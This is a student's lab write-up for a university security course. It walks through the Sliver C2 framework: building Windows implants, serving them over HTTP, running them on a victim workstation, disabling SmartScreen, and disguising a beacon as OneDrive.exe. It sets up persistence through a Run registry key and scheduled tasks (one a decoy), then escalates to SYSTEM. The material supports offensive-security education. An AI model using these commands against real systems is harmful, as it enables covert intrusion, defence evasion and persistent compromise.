Sliver C2 ‐ Lab - jacobwilliams100/sec-440 GitHub Wiki

Initial Setup

Initial Kali config



update with sudo apt update


Installing Silver C2 with sudo apt install sliver


It can take a while


Task 1 – Working with Sliver

1.1 Starting Sliver

open a new tab, start sliver server with the command sliver-server


we enter multiplayer mode with multiplayer


and we run jobs to see if the server is ready

If it looks like this, it's ready to go!


Deliverable #1.1 - What is the protocol and port number that the server is running on and can we change it to something different?

The server is running using tcp on port 31337.

The way I found to change port is a bit involved.

We need to edit /home/champuser/.sliver/configs/server.json

and change this value to the port that you want


Then we must edit the client config file /home/champuser/simlab_10.0.5.110.cfg

Change this value to your desired port


Reload the config files with sliver-client import /home/champuser/simlab_10.0.5.110.cfg


Then we need to start the server in daemon mode, which is the only way to get it to load server.json. Daemon mode works a bit differently from just normally running the command in that it provides no interactive CLI for the server application, and runs multiplayer integrally on startup rather than as a startable job because the client is the only way to access.

We do this with sliver-server daemon


It should hang on this command because it is treating the program like a service

Open a new terminal window and start up the client with sliver-client


As we can see, it connects on the new port "12345"

I feel like there is probably an easier and more convenient way to do this but I already spent a long time figuring out how to get this to work so I am moving on.

1.2 New Client

We create a new client with new-operator -n simlab -l (don't use this IP, add your own)


In a new terminal tab, import the Sliver client configuration with sliver-client import /home/champuser/simlab_....


You should now be able to connect with sliver-client


Check for active sessions with sessions


Task 2 – Creating and Using Implants

Creating Session Implant

Create profile for session implant with profiles new --mtls --format exe --os windows --arch amd64 windows-session


(make sure you use your own IP address in place of this one)

Now we will create the beacon profile with profiles new beacon --mtls --format exe --seconds 5 --jitter 3 --os windows --arch amd64 windows-beacon


Deliverable 2.1 - Submit a screenshot showing the successful creation of the two profiles mentioned above. Your screenshot should show something similar to what is seen in figure 2.1


2.2 Generating Implants & Starting a Web Server

We use two commands to generate a session and beacon implant:

profiles generate --save ~/Public/imp1.exe windows-session


profiles generate --save ~/Public/beacon1.exe windows-beacon


Now open a third terminal and navigate to ~/Public with cd Public


and run the command file imp1.exe beacon1.exeto check for the implants we just created

Deliverable 2.2# - Submit a screenshot similar to what is seen in figure 2.5 that shows the type of implants you just created.


Webserver startup

Start up the web server with sudo python3 -m http.server 80


Test connection to server...


2.3 Preparing a Directory for Our Files

Preparing a directory for our files: run sudo mkdir /var/www/html/files to create it

Copy the two executables from ~/Public to /var/www/html/files using the command sudo cp ~/Public/*.exe /var/www/html/files


Let's make sure we have the proper permissions on the directory and the files with sudo chmod -R 755 /var/www/html/files/


Task 3 - Interacting with Our Sessions

Back on the client window, see what sessions are available with sessions

No sessions so far


3.1 Activating mtls Listener

On the server, activate MTLS listener with mtls


3.2 Downloading and Deploying Our Implants

Now, we will be testing this with the windows workstation wks1. Use it to connect to your kali VM

It didn't work because my python webserver was still running out of my Public folder


I needed to re-run it from /var/www/html



It worked!

Download imp1.exe


Your web browser may prevent you from downloading this.


If it doesn't work, try it in Firefox


Then run imp1.exe as administrator


You may get this warning.


If so, you may need to temporarily disable real-time protection


This worked!


Back on the kali system, open the client window and enter sessions once again


This is what we are looking for. The session with wks01 has been established!

To interact with this session, enter use [ID]


It will assign a codename to the session

Try running some commands to see if it can process them as wks01.

Deliverable 3.1# - Submit proof that you have connected to the victim system, this could be by running the “ifconfig” command or anything or your choice (e.g. whoami, ls, etc).


To avoid any issues moving forward, let's disable this Windows SmartScreen. This can be done from your sliver client using the following command:

execute -o REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"


Task 4 – Persistence & Lateral Movement

4.1 Uploading the Beacon Implant

We will upload the beacon implant we created earlier to the wks01 target and disguise it as "onedrive.exe"

We will use this command:

upload '/var/www/html/files/beacon1.exe' 'C:\Users\Public\OneDrive.exe'


Q&A: Why did we upload the beacon.exe to the C:\Users\Public directory?

4.2 Registry - Autorun

We upload beacon.exe to the C:\Users\Public so that it is in a directory that is available to all users, meaning it stays active no matter who is logged in, increasing the persistency of the threat. Changing users will not disable the beacon.

Now we will add autorun for this .exe to the Windows Registry with the following command:

execute -o reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OneDriveUpdater" /t REG_SZ /F /D "C:\Users\Public\OneDrive.exe"


Deliverable 4.1 - Submit proof that you have both tasks performed successfully.


We log out and log back in


We see that "OneDrive" has been added to the Users/Public Folder


And we can see that "OneDriveUpdater" has been added to the Windows Registry.


4.3 Scheduled Tasks

Using Scheduled tasks, We will add another persistence mechanism plus a diversion.

The diversion will be a fake scheduled network task. We will reopen the sliver shell and run:

execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN PingBing /TR "cmd.exe /c ping -c 10"


Now, we add configuration to run imp1.exe

We upload another copy with: upload '/var/www/html/files/imp1.exe' 'C:\Users\Public\Downloads\Checkme.exe'


and execute it with: execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN CheckMe /TR C:\Users\Public\Downloads\Checkme.exe


Deliverable 4.2 - Submit proof that you have both tasks performed successfully.

In task scheduler on wks01, we can now see the PingBing fake network task we scheduled to distract their technicians


CheckMe is here too, but it is failing due to an unknown file location. I think its because my command to set it up lacked quote marks around the location. I just fixed it manually here.




Seems to be running properly now

4.4 Getting SYSTEM

We execute our privileges to SYSTEM with getsystem


NOTE: I needed to unjoin wks01 from the domain and repeat several of the above steps to get this to work!

This should give us access to a new system session, switch to it


We're in!

Deliverable 4.3 - Submit proof that you have obtained SYSTEM on your Windows system.



This was probably my favorite lab yet. Until this point, we have been playing defense, learning about different ways to harden systems and respond to threats. This time, we got to play the attacker, and learn how a basis persistent threat operates. We briefly learned about persistent threats from the SolarWinds discussion board assignment during the second week of class, and I was hoping we would get to demo this type of situation. I would have appreciated a bit more guidance on deliverable 1.1, specifically the part about getting sliver-server to run on a different port. It took me a long time to figure out a way to do this, and I feel like there is probably an easier way than the one I found. Also, the third command of part 4.3 did not work properly the first time I did it because the file directory is not in quotations, so it did not include the /'s properly. The one other issue I had was that "getsystem" kept failing, and I think that had to do with the PC still being part of Active Directory. I left the domain, re-did some of the commands that were undone by this, and then it worked. Overall, I thought this was a great lab, and I am looking forward to moving on to the second part.